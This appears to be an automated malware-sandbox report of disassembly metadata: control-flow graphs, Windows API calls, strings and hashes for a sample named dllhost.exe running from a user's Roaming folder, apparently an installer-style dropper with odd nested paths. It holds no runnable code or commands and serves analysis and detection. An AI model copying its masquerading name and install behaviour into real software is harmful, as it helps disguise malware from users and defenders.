                                                                              control_flow_graph 498 40595a-405980 call 405c25 501 405982-405994 DeleteFileW 498->501 502 405999-4059a0 498->502 503 405b16-405b1a 501->503 504 4059a2-4059a4 502->504 505 4059b3-4059c3 call 40624c 502->505 506 405ac4-405ac9 504->506 507 4059aa-4059ad 504->507 513 4059d2-4059d3 call 405b69 505->513 514 4059c5-4059d0 lstrcatW 505->514 506->503 509 405acb-405ace 506->509 507->505 507->506 511 405ad0-405ad6 509->511 512 405ad8-405ae0 call 40658f 509->512 511->503 512->503 522 405ae2-405af6 call 405b1d call 405912 512->522 515 4059d8-4059dc 513->515 514->515 518 4059e8-4059ee lstrcatW 515->518 519 4059de-4059e6 515->519 521 4059f3-405a0f lstrlenW FindFirstFileW 518->521 519->518 519->521 523 405a15-405a1d 521->523 524 405ab9-405abd 521->524 538 405af8-405afb 522->538 539 405b0e-405b11 call 4052b0 522->539 527 405a3d-405a51 call 40624c 523->527 528 405a1f-405a27 523->528 524->506 526 405abf 524->526 526->506 540 405a53-405a5b 527->540 541 405a68-405a73 call 405912 527->541 530 405a29-405a31 528->530 531 405a9c-405aac FindNextFileW 528->531 530->527 534 405a33-405a3b 530->534 531->523 537 405ab2-405ab3 FindClose 531->537 534->527 534->531 537->524 538->511 544 405afd-405b0c call 4052b0 call 406012 538->544 539->503 540->531 545 405a5d-405a66 call 40595a 540->545 550 405a94-405a97 call 4052b0 541->550 551 405a75-405a78 541->551 544->503 545->531 550->531 554 405a7a-405a8a call 4052b0 call 406012 551->554 555 405a8c-405a92 551->555 554->531 555->531
                                                                              APIs
                                                                              • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,7570D4C4,00000000), ref: 00405983
                                                                              • lstrcatW.KERNEL32(004256F0,\*.*,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,7570D4C4,00000000), ref: 004059CB
                                                                              • lstrcatW.KERNEL32(?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,7570D4C4,00000000), ref: 004059EE
                                                                              • lstrlenW.KERNEL32(?,?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,7570D4C4,00000000), ref: 004059F4
                                                                              • FindFirstFileW.KERNELBASE(004256F0,?,?,?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,7570D4C4,00000000), ref: 00405A04
                                                                              • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AA4
                                                                              • FindClose.KERNEL32(00000000), ref: 00405AB3
                                                                              Strings
                                                                              • "C:\Users\user\AppData\Roaming\dllhost.exe" , xrefs: 0040595A
                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405968
                                                                              • \*.*, xrefs: 004059C5
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                              • String ID: "C:\Users\user\AppData\Roaming\dllhost.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                                                              • API String ID: 2035342205-201830484
                                                                              • Opcode ID: cef271d36a4cb6b758dae5d81120ae6a1160f274867ba4d7352c158524ee07bb
                                                                              • Instruction ID: a8a76f5088e9b8e84a0c744efebc89a786f36fdc765849bba2b15b9d7042df22
                                                                              • Opcode Fuzzy Hash: cef271d36a4cb6b758dae5d81120ae6a1160f274867ba4d7352c158524ee07bb
                                                                              • Instruction Fuzzy Hash: BA41E230A01A14AACB21BB658C89ABF7778EF81764F50427FF801711D1D77C5982DEAE
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 243907c00f3d7d55c33cca0d1e8b50e30fc2ef132c4317966eea85650a7ed6a7
                                                                              • Instruction ID: dcd014b85e7262d3741248fa227238ad6671e2837142342cd84456719761ddbf
                                                                              • Opcode Fuzzy Hash: 243907c00f3d7d55c33cca0d1e8b50e30fc2ef132c4317966eea85650a7ed6a7
                                                                              • Instruction Fuzzy Hash: 7FF17871D04229CBCF18CFA8C8946ADBBB0FF44305F25856ED856BB281D7386A86CF45
                                                                              APIs
                                                                              • FindFirstFileW.KERNELBASE(?,00426738,00425EF0,00405C6E,00425EF0,00425EF0,00000000,00425EF0,00425EF0,?,?,7570D4C4,0040597A,?,C:\Users\user\AppData\Local\Temp\,7570D4C4), ref: 0040659A
                                                                              • FindClose.KERNEL32(00000000), ref: 004065A6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: Find$CloseFileFirst
                                                                              • String ID: 8gB
                                                                              • API String ID: 2295610775-1733800166
                                                                              • Opcode ID: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
                                                                              • Instruction ID: 94cc43f68e1cdd1d7b1eae1ec77a84073341a0d38183f0b632eac2f66d480838
                                                                              • Opcode Fuzzy Hash: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
                                                                              • Instruction Fuzzy Hash: 5DD01231509020ABC20157387D0C85BBA5C9F55331B129A37B466F52E4D7348C6286AC
                                                                              APIs
                                                                              • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?), ref: 0040217D
                                                                              Strings
                                                                              • C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Playlet, xrefs: 004021BD
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: CreateInstance
                                                                              • String ID: C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Playlet
                                                                              • API String ID: 542301482-2207628267
                                                                              • Opcode ID: 891fa9c4e5cabca34a4c7ad1f8027ea32194b00e0f3f0a60056e0d7117170fd1
                                                                              • Instruction ID: 8d58e3acc7b173ba9b06918936dfe92dd1a067fa61399e551ad1d720d45e9931
                                                                              • Opcode Fuzzy Hash: 891fa9c4e5cabca34a4c7ad1f8027ea32194b00e0f3f0a60056e0d7117170fd1
                                                                              • Instruction Fuzzy Hash: A64148B5A00208AFCB10DFE4C988AAEBBB5FF48314F20457AF515EB2D1DB799941CB44
                                                                              APIs
                                                                              • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 00402871
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: FileFindFirst
                                                                              • String ID:
                                                                              • API String ID: 1974802433-0
                                                                              • Opcode ID: e1c3063bf10c5ef6748f1a2a306b49316e07f1283b06f73373375dfd7fee89f9
                                                                              • Instruction ID: 457e94eee93b26a2a7a920d72ffedce9eee0ef57ab85e6e0c0e07cda1b0ec514
                                                                              • Opcode Fuzzy Hash: e1c3063bf10c5ef6748f1a2a306b49316e07f1283b06f73373375dfd7fee89f9
                                                                              • Instruction Fuzzy Hash: 72F08271A04104EFD710EBA4DD49AADB378EF00314F2045BBF911F21D1D7B44E409B2A

                                                                              Control-flow Graph

                                                                              control_flow_graph 190 403d08-403d1a 191 403d20-403d26 190->191 192 403e5b-403e6a 190->192 191->192 195 403d2c-403d35 191->195 193 403eb9-403ece 192->193 194 403e6c-403eb4 GetDlgItem * 2 call 4041e1 SetClassLongW call 40140b 192->194 199 403ed0-403ed3 193->199 200 403f0e-403f13 call 40422d 193->200 194->193 196 403d37-403d44 SetWindowPos 195->196 197 403d4a-403d4d 195->197 196->197 201 403d67-403d6d 197->201 202 403d4f-403d61 ShowWindow 197->202 204 403ed5-403ee0 call 401389 199->204 205 403f06-403f08 199->205 212 403f18-403f33 200->212 207 403d89-403d8c 201->207 208 403d6f-403d84 DestroyWindow 201->208 202->201 204->205 227 403ee2-403f01 SendMessageW 204->227 205->200 211 4041ae 205->211 218 403d8e-403d9a SetWindowLongW 207->218 219 403d9f-403da5 207->219 215 40418b-404191 208->215 217 4041b0-4041b7 211->217 213 403f35-403f37 call 40140b 212->213 214 403f3c-403f42 212->214 213->214 223 403f48-403f53 214->223 224 40416c-404185 DestroyWindow EndDialog 214->224 215->211 222 404193-404199 215->222 218->217 225 403e48-403e56 call 404248 219->225 226 403dab-403dbc GetDlgItem 219->226 222->211 228 40419b-4041a4 ShowWindow 222->228 223->224 229 403f59-403fa6 call 40626e call 4041e1 * 3 GetDlgItem 223->229 224->215 225->217 230 403ddb-403dde 226->230 231 403dbe-403dd5 SendMessageW IsWindowEnabled 226->231 227->217 228->211 260 403fb0-403fec ShowWindow KiUserCallbackDispatcher call 404203 EnableWindow 229->260 261 403fa8-403fad 229->261 234 403de0-403de1 230->234 235 403de3-403de6 230->235 231->211 231->230 238 403e11-403e16 call 4041ba 234->238 239 403df4-403df9 235->239 240 403de8-403dee 235->240 238->225 241 403dfb-403e01 239->241 242 403e2f-403e42 SendMessageW 239->242 240->242 245 403df0-403df2 240->245 246 403e03-403e09 call 40140b 241->246 247 403e18-403e21 call 40140b 241->247 242->225 245->238 256 403e0f 246->256 247->225 257 403e23-403e2d 247->257 256->238 257->256 264 403ff1 260->264 265 403fee-403fef 260->265 261->260 266 403ff3-404021 GetSystemMenu EnableMenuItem SendMessageW 264->266 265->266 267 404023-404034 SendMessageW 266->267 268 404036 266->268 269 40403c-40407b call 404216 call 403ce9 call 40624c lstrlenW call 40626e SetWindowTextW call 401389 267->269 268->269 269->212 280 404081-404083 269->280 280->212 281 404089-40408d 280->281 282 4040ac-4040c0 DestroyWindow 281->282 283 40408f-404095 281->283 282->215 285 4040c6-4040f3 CreateDialogParamW 282->285 283->211 284 40409b-4040a1 283->284 284->212 286 4040a7 284->286 285->215 287 4040f9-404150 call 4041e1 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 285->287 286->211 287->211 292 404152-404165 ShowWindow call 40422d 287->292 294 40416a 292->294 294->215
                                                                              APIs
                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D44
                                                                              • ShowWindow.USER32(?), ref: 00403D61
                                                                              • DestroyWindow.USER32 ref: 00403D75
                                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403D91
                                                                              • GetDlgItem.USER32(?,?), ref: 00403DB2
                                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DC6
                                                                              • IsWindowEnabled.USER32(00000000), ref: 00403DCD
                                                                              • GetDlgItem.USER32(?,00000001), ref: 00403E7B
                                                                              • GetDlgItem.USER32(?,00000002), ref: 00403E85
                                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 00403E9F
                                                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403EF0
                                                                              • GetDlgItem.USER32(?,00000003), ref: 00403F96
                                                                              • ShowWindow.USER32(00000000,?), ref: 00403FB7
                                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FC9
                                                                              • EnableWindow.USER32(?,?), ref: 00403FE4
                                                                              • GetSystemMenu.USER32 ref: 00403FFA
                                                                              • EnableMenuItem.USER32 ref: 00404001
                                                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404019
                                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040402C
                                                                              • lstrlenW.KERNEL32(004236E8,?,004236E8,00000000), ref: 00404056
                                                                              • SetWindowTextW.USER32(?,004236E8,00000000,004236E8,?,004236E8,00000000), ref: 0040406A
                                                                              • ShowWindow.USER32(?,0000000A), ref: 0040419E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                              • String ID: ,UZ$6B
                                                                              • API String ID: 3282139019-3075455786
                                                                              • Opcode ID: 63d51f50975af08fe142ac7da96eaef83eb7a6380e3783fe0f342e2b0760fb65
                                                                              • Instruction ID: aba62e874285a6ff7dd8be06960963098d8abb6283381b386aa5fa49e43a5191
                                                                              • Opcode Fuzzy Hash: 63d51f50975af08fe142ac7da96eaef83eb7a6380e3783fe0f342e2b0760fb65
                                                                              • Instruction Fuzzy Hash: 35C1C071640205BBDB216F61EE88E2B3A6CFB95705F40053EF641B52F0CB3A5992DB2D

                                                                              Control-flow Graph

                                                                              control_flow_graph 295 40395a-403972 call 406626 298 403974-403984 call 406193 295->298 299 403986-4039bd call 40611a 295->299 308 4039e0-403a09 call 403c30 call 405c25 298->308 304 4039d5-4039db lstrcatW 299->304 305 4039bf-4039d0 call 40611a 299->305 304->308 305->304 313 403a9b-403aa3 call 405c25 308->313 314 403a0f-403a14 308->314 320 403ab1-403ad6 LoadImageW 313->320 321 403aa5-403aac call 40626e 313->321 314->313 316 403a1a-403a42 call 40611a 314->316 316->313 322 403a44-403a48 316->322 324 403b57-403b5f call 40140b 320->324 325 403ad8-403b08 RegisterClassW 320->325 321->320 326 403a5a-403a66 lstrlenW 322->326 327 403a4a-403a57 call 405b4a 322->327 338 403b61-403b64 324->338 339 403b69-403b74 call 403c30 324->339 328 403c26 325->328 329 403b0e-403b52 SystemParametersInfoW CreateWindowExW 325->329 333 403a68-403a76 lstrcmpiW 326->333 334 403a8e-403a96 call 405b1d call 40624c 326->334 327->326 332 403c28-403c2f 328->332 329->324 333->334 337 403a78-403a82 GetFileAttributesW 333->337 334->313 341 403a84-403a86 337->341 342 403a88-403a89 call 405b69 337->342 338->332 348 403b7a-403b94 ShowWindow call 4065b6 339->348 349 403bfd-403bfe call 405383 339->349 341->334 341->342 342->334 354 403ba0-403bb2 GetClassInfoW 348->354 355 403b96-403b9b call 4065b6 348->355 353 403c03-403c05 349->353 356 403c07-403c0d 353->356 357 403c1f-403c21 call 40140b 353->357 360 403bb4-403bc4 GetClassInfoW RegisterClassW 354->360 361 403bca-403bed DialogBoxParamW call 40140b 354->361 355->354 356->338 362 403c13-403c1a call 40140b 356->362 357->328 360->361 366 403bf2-403bfb call 4038aa 361->366 362->338 366->332
                                                                              APIs
                                                                                • Part of subcall function 00406626: GetModuleHandleA.KERNEL32(?,00000020,?,004033AF,0000000A), ref: 00406638
                                                                                • Part of subcall function 00406626: GetProcAddress.KERNEL32(00000000,?), ref: 00406653
                                                                              • lstrcatW.KERNEL32(1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\,7570D4C4,"C:\Users\user\AppData\Roaming\dllhost.exe" ,00000000), ref: 004039DB
                                                                              • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A5B
                                                                              • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000), ref: 00403A6E
                                                                              • GetFileAttributesW.KERNEL32(: Completed), ref: 00403A79
                                                                              • LoadImageW.USER32 ref: 00403AC2
                                                                                • Part of subcall function 00406193: wsprintfW.USER32 ref: 004061A0
                                                                              • RegisterClassW.USER32(004291A0), ref: 00403AFF
                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B17
                                                                              • CreateWindowExW.USER32 ref: 00403B4C
                                                                              • ShowWindow.USER32(00000005,00000000), ref: 00403B82
                                                                              • GetClassInfoW.USER32(00000000,RichEdit20W,004291A0), ref: 00403BAE
                                                                              • GetClassInfoW.USER32(00000000,RichEdit,004291A0), ref: 00403BBB
                                                                              • RegisterClassW.USER32(004291A0), ref: 00403BC4
                                                                              • DialogBoxParamW.USER32 ref: 00403BE3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                              • String ID: "C:\Users\user\AppData\Roaming\dllhost.exe" $.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$6B
                                                                              • API String ID: 1975747703-3853068990
                                                                              • Opcode ID: 9009dd5c4e79219ed8b7ac5de4ccd7622ef0cbd3e7ca304b0b87491ac01893d5
                                                                              • Instruction ID: 49200ef38db144648603e0831490e707cb7affae0874970ced47d7304c9e666f
                                                                              • Opcode Fuzzy Hash: 9009dd5c4e79219ed8b7ac5de4ccd7622ef0cbd3e7ca304b0b87491ac01893d5
                                                                              • Instruction Fuzzy Hash: D561B970204601BAE330AF669D49F2B3A7CEB84745F40457FF945B52E2CB7D5912CA2D

                                                                              Control-flow Graph

                                                                              control_flow_graph 369 402ec1-402f0f GetTickCount GetModuleFileNameW call 405d3e 372 402f11-402f16 369->372 373 402f1b-402f49 call 40624c call 405b69 call 40624c GetFileSize 369->373 374 4030f3-4030f7 372->374 381 403036-403044 call 402e5d 373->381 382 402f4f 373->382 388 403046-403049 381->388 389 403099-40309e 381->389 384 402f54-402f6b 382->384 386 402f6d 384->386 387 402f6f-402f78 call 4032df 384->387 386->387 395 4030a0-4030a8 call 402e5d 387->395 396 402f7e-402f85 387->396 391 40304b-403063 call 4032f5 call 4032df 388->391 392 40306d-403097 GlobalAlloc call 4032f5 call 4030fa 388->392 389->374 391->389 419 403065-40306b 391->419 392->389 417 4030aa-4030bb 392->417 395->389 401 403001-403005 396->401 402 402f87-402f9b call 405cf9 396->402 406 403007-40300e call 402e5d 401->406 407 40300f-403015 401->407 402->407 416 402f9d-402fa4 402->416 406->407 413 403024-40302e 407->413 414 403017-403021 call 406719 407->414 413->384 418 403034 413->418 414->413 416->407 422 402fa6-402fad 416->422 423 4030c3-4030c8 417->423 424 4030bd 417->424 418->381 419->389 419->392 422->407 425 402faf-402fb6 422->425 426 4030c9-4030cf 423->426 424->423 425->407 427 402fb8-402fbf 425->427 426->426 428 4030d1-4030ec SetFilePointer call 405cf9 426->428 427->407 429 402fc1-402fe1 427->429 432 4030f1 428->432 429->389 431 402fe7-402feb 429->431 433 402ff3-402ffb 431->433 434 402fed-402ff1 431->434 432->374 433->407 435 402ffd-402fff 433->435 434->418 434->433 435->407
                                                                              APIs
                                                                              • GetTickCount.KERNEL32(C:\Users\user\AppData\Local\Temp\,7570D4C4,00000000,004035F7,00000006,?,00000006,00000008,0000000A), ref: 00402ED2
                                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\dllhost.exe,00000400,?,00000006,00000008,0000000A), ref: 00402EEE
                                                                                • Part of subcall function 00405D3E: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\AppData\Roaming\dllhost.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D42
                                                                                • Part of subcall function 00405D3E: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D64
